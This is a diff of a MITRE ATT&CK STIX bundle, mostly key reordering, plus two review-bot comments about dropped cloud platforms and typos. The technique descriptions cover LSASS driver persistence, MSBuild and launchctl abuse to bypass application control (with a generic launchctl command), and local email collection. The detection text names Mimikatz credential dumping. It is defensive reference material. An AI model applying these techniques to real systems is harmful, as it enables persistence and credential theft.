+ "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "SYSTEM"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -14363,6 +14941,26 @@
"created": "2018-01-16T16:13:52.465Z"
},
{
+ "created": "2020-01-24T18:38:55.801Z",
+ "modified": "2020-03-25T16:52:26.567Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4",
+ "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.",
+ "name": "LSASS Driver",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -14390,26 +14988,6 @@
"source_name": "TechNet Autoruns"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "LSASS Driver",
- "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.",
- "id": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- }
- ],
- "modified": "2020-03-25T16:52:26.567Z",
- "created": "2020-01-24T18:38:55.801Z",
"x_mitre_platforms": [
"Windows"
],
@@ -14472,25 +15050,25 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-24T20:34:26.145Z",
+ "modified": "2020-06-09T20:46:00.393Z",
"created": "2020-02-11T18:41:44.783Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
],
"x_mitre_data_sources": [
"Process command-line parameters",
"PowerShell logs",
"Process monitoring"
],
- "x_mitre_contributors": [
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -14517,11 +15095,12 @@
],
"modified": "2020-03-23T22:10:10.862Z",
"created": "2020-03-11T21:01:00.959Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.",
"x_mitre_data_sources": [
"Process command-line parameters",
"File monitoring",
@@ -14531,12 +15110,11 @@
"Network protocol analysis",
"Process monitoring"
],
- "x_mitre_detection": "Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -14661,19 +15239,19 @@
],
"modified": "2020-03-25T22:11:45.513Z",
"created": "2020-01-17T16:10:58.592Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "File monitoring"
],
+ "x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.",
- "x_mitre_data_sources": [
- "Process monitoring",
- "File monitoring"
+ "x_mitre_platforms": [
+ "macOS"
]
},
{
@@ -14759,20 +15337,20 @@
],
"modified": "2020-03-25T22:27:49.609Z",
"created": "2020-01-17T19:23:15.227Z",
- "x_mitre_platforms": [
- "macOS"
- ],
- "x_mitre_detection": "Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. ",
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_data_sources": [
+ "File monitoring"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_effective_permissions": [
"root"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "File monitoring"
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor for launch daemon creation or modification through plist files and utilities such as Objective-See's KnockKnock application. ",
+ "x_mitre_platforms": [
+ "macOS"
]
},
{
@@ -14818,7 +15396,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Launchctl",
- "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nBy loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)\n\nRunning a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\". Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.",
+ "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\n\nBy loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)\n\nRunning a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute \"arg\" \"arg\" \"arg\". Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.",
"id": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -14827,23 +15405,23 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-28T18:28:34.600Z",
+ "modified": "2020-06-08T23:28:29.079Z",
"created": "2020-03-10T18:26:56.187Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
],
+ "x_mitre_detection": "KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.",
- "x_mitre_permissions_required": [
- "User",
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"external_references": [
@@ -14887,21 +15465,21 @@
],
"modified": "2020-03-23T22:41:14.739Z",
"created": "2019-12-03T14:15:27.452Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "root"
],
+ "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
"x_mitre_data_sources": [
"Process command-line parameters",
"File monitoring",
"Process monitoring"
],
- "x_mitre_detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
- "x_mitre_permissions_required": [
- "root"
- ],
- "x_mitre_remote_support": false,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"external_references": [
@@ -14937,22 +15515,22 @@
],
"modified": "2020-03-29T23:12:40.041Z",
"created": "2020-02-04T19:24:27.774Z",
- "x_mitre_platforms": [
- "macOS",
- "Linux"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
],
+ "x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.",
- "x_mitre_permissions_required": [
- "User",
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ]
},
{
"external_references": [
@@ -14983,23 +15561,23 @@
],
"modified": "2020-03-23T18:04:20.780Z",
"created": "2020-01-28T13:50:22.506Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
],
+ "x_mitre_detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.",
"x_mitre_data_sources": [
"Process monitoring",
"Process command-line parameters",
"Authentication logs",
"Windows event logs"
],
- "x_mitre_detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15025,21 +15603,21 @@
],
"modified": "2020-03-20T19:39:59.544Z",
"created": "2020-02-21T21:07:55.393Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -15078,21 +15656,21 @@
],
"modified": "2020-03-23T21:48:41.083Z",
"created": "2020-03-13T20:26:46.695Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Authentication logs"
- ],
- "x_mitre_detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"User"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.",
+ "x_mitre_data_sources": [
+ "Authentication logs"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -15116,26 +15694,39 @@
"phase_name": "collection"
}
],
- "modified": "2020-03-24T16:38:51.557Z",
+ "modified": "2020-05-26T19:23:54.854Z",
"created": "2020-03-13T21:13:10.467Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows",
- "AWS",
- "GCP",
- "Azure"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
+ "created": "2020-02-19T18:46:06.098Z",
+ "modified": "2020-03-24T17:59:20.983Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004",
+ "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)",
+ "name": "Local Email Collection",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
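Review bot: The `x_mitre_platforms` array at the end of the first object in this hunk drops `AWS`, `GCP` and `Azure` on the new side, and that semantic change is buried under the same key-reordering churn that every other hunk in view shows; anything that filters this bundle by platform will stop returning this technique for those cloud platforms. The reordering itself presumably comes from dict-ordering differences in whatever regenerates the file, so emitting it with a stable key order (for example `json.dump(obj, f, indent=2, sort_keys=True)`) would keep future diffs down to the real changes. If this is a verbatim sync from the upstream ATT&CK bundle, the platform drop should at least be called out in the commit description so consumers of the platform filter are not surprised.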
@@ -15153,22 +15744,6 @@
"description": "Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Local Email Collection",
- "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user\u2019s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft Outlook Files)",
- "id": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
- ],
- "modified": "2020-03-24T17:59:20.983Z",
- "created": "2020-02-19T18:46:06.098Z",
"x_mitre_platforms": [
"Windows"
],
@@ -15209,22 +15784,22 @@
],
"modified": "2020-03-26T17:48:27.871Z",
"created": "2020-03-12T19:29:21.013Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--c0a384a4-9a25-40e1-97b6-458388474bc8",
@@ -15354,16 +15929,16 @@
],
"modified": "2020-03-27T16:49:15.786Z",
"created": "2020-01-10T16:01:15.995Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3",
@@ -15403,16 +15978,16 @@
],
"modified": "2020-03-24T23:45:03.153Z",
"created": "2020-01-10T03:43:37.211Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_data_sources": [
"Process monitoring",
"Windows Registry"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"external_references": [
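Review bot: The `x_mitre_detection` string carried onto the new side still reads `Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript`, two typos (`scrips`, `nameley`) that the reorder preserves. Since this bundle looks like a copy of the upstream ATT&CK data, the fix belongs upstream or in the generator rather than as a hand edit here, otherwise the next sync reverts it; the corrected sentence would be `Monitor for changes to Registry values associated with Windows logon scripts, namely HKCU\\Environment\\UserInitMprLogonScript.`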
@@ -15437,7 +16012,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "MSBuild",
- "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
+ "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)",
"id": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -15446,22 +16021,38 @@
"kill_chain_name": "mitre-attack"
}
],
- "modified": "2020-03-29T19:56:43.201Z",
+ "modified": "2020-06-08T23:29:28.074Z",
"created": "2020-03-27T21:50:26.042Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Process monitoring"
- ],
- "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_system_requirements": [
" .NET Framework version 4 or higher"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_data_sources": [
+ "Process monitoring"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2020-03-15T16:21:45.131Z",
+ "modified": "2020-03-26T20:28:00.985Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
